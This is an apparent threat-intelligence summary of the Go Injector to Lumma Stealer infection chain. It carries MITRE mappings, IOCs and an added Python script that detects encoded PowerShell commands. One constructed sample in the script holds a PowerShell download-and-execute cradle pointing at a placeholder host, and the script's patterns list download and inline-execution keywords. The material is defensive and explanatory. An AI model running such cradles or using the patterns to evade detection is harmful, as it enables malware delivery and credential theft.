Go Injector: A Pathway to Stealers

eSentire’s Threat Response Unit (TRU) detected Go Injector leading to Lumma Stealer through a fake CAPTCHA page that socially engineers users into running malicious PowerShell commands. The investigation reveals a three-step injection chain and Lumma Stealer’s MaaS operations targeting cryptocurrency wallets and 2FA data, underscoring the need to guard against social-engineering tactics.

Keypoints

  • TRU observed Go Injector leading to Lumma Stealer in August 2024.
  • Lumma Stealer operates as Malware-as-a-Service (MaaS) and targets cryptocurrency wallets and 2FA browser extensions.
  • The infection starts on a malicious site displaying a fake captcha that prompts user action.
  • Malicious PowerShell commands download and execute the payloads.
  • Go Injector performs a 3-step injection process to run Lumma Stealer.
  • Decoy and encryption techniques (Base64-encoded commands, AES-GCM decryption) are used to deliver the final payload and conceal activity.
  • Recommendations emphasize social-engineering awareness and continuous IOC monitoring by 24/7 SOC teams.

MITRE Techniques

  • [T1059.001] PowerShell – Used to execute a Base64-encoded command provided to the user via a fake captcha page.
  • [T1059] Command and Scripting Interpreter – PowerShell commands were executed to download and extract malicious payloads.
  • [T1055] Process Injection – Go Injector uses a process injection technique to execute Lumma Stealer.
  • [T1003] Credential Dumping – Lumma Stealer targets sensitive data including cryptocurrency wallets and 2FA browser extensions.
  • [T1059.005] VBScript – When decoding the VBScript code, an encoded PowerShell command is present.
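
The key points and the T1059.001 entry above both hinge on the same observable: a user-launched PowerShell process carrying a Base64-encoded (UTF-16LE) command that downloads and runs a payload. The detection script below is an added example written for this summary; it is not code from eSentire or from the Go Injector/Lumma Stealer analysis. It decodes the `-EncodedCommand` argument from constructed process-creation events, scores download-and-execute indicators in the decoded text, and treats `explorer.exe` as the parent (the Run dialog or a console opened by the user, which is an assumption about how the pasted command is launched, since the summary does not say). The sample events, the placeholder URL and the scoring thresholds are all constructed for the example.

```python
import base64
import re

# Matches the -EncodedCommand switch and its common unambiguous prefixes
# (-e, -ec, -en, -enc) followed by a Base64 blob. This is a subset of what
# PowerShell accepts, chosen to keep the example readable.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")

# Indicator families looked for in the decoded command plus the visible command line.
SUSPICIOUS_PATTERNS = {
    "download_cradle": r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient",
    "inline_exec":     r"invoke-expression|\biex\b",
    "hidden_window":   r"-w(?:indowstyle)?\s+hidden",
    "base64_decode":   r"frombase64string",
    "archive_extract": r"expand-archive",
}

ALERT_THRESHOLD = 3  # constructed threshold for this example


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand text, or None if absent or not valid Base64/UTF-16LE."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError both derive from ValueError
        return None


def score_event(parent_image: str, cmdline: str) -> dict:
    """Heuristic score for one process-creation event.

    +1 if an encoded command is present,
    +1 per indicator family hit (capped at 3),
    +1 if the parent is explorer.exe (assumed user-launched, e.g. Run dialog).
    """
    decoded = decode_encoded_command(cmdline)
    visible = ENC_FLAG.sub(" ", cmdline)            # drop the blob so it cannot self-match
    text = ((decoded or "") + " " + visible).lower()
    hits = [name for name, pat in SUSPICIOUS_PATTERNS.items() if re.search(pat, text)]
    score = (1 if decoded is not None else 0) + min(len(hits), 3)
    if parent_image.lower().endswith("explorer.exe"):
        score += 1
    return {
        "score": score,
        "decoded": decoded,
        "hits": hits,
        "verdict": "ALERT" if score >= ALERT_THRESHOLD else "ok",
    }


def scan_events(events):
    """Score a list of (parent_image, command_line) tuples."""
    return [score_event(parent, cmd) for parent, cmd in events]


def _encode(ps: str) -> str:
    """Build a -EncodedCommand argument (Base64 of UTF-16LE); used only to construct samples."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


# Constructed sample events (parent image, command line); not from the report.
# The URL is a placeholder, not an indicator from the page.
SAMPLE_EVENTS = [
    ("C:\\Windows\\explorer.exe",
     "powershell.exe -w hidden -enc "
     + _encode("iex (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/stage')")),
    ("C:\\Windows\\System32\\svchost.exe",
     "powershell.exe -NoProfile -Command Get-Date"),
    ("C:\\Windows\\explorer.exe",
     "powershell.exe -enc " + _encode("Get-ChildItem C:\\Users")),
]

if __name__ == "__main__":
    for (parent, cmd), result in zip(SAMPLE_EVENTS, scan_events(SAMPLE_EVENTS)):
        print(f"{result['verdict']:5} score={result['score']} hits={result['hits']} parent={parent}")
        if result["decoded"]:
            print("      decoded:", result["decoded"])
```

Only the first event crosses the threshold: an encoded command, a download cradle, inline execution, a hidden window and a user-launched parent. The third event shows why decoding matters: an encoded command from `explorer.exe` alone is not enough to alert, which keeps benign administrative use below the line while still surfacing the decoded text for an analyst.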

Indicators of Compromise

  • [File Name] Involved artifacts – 0klevgrand.exe, Dialer.exe
  • [MD5] Lumma Stealer module – E372BBE59DC7DA4FDAB393DA71404848
  • [URL] Public analysis reference – https://www.joesandbox.com/analysis/1491044/0/html

Read more: https://www.esentire.com/blog/go-injector-leading-to-stealers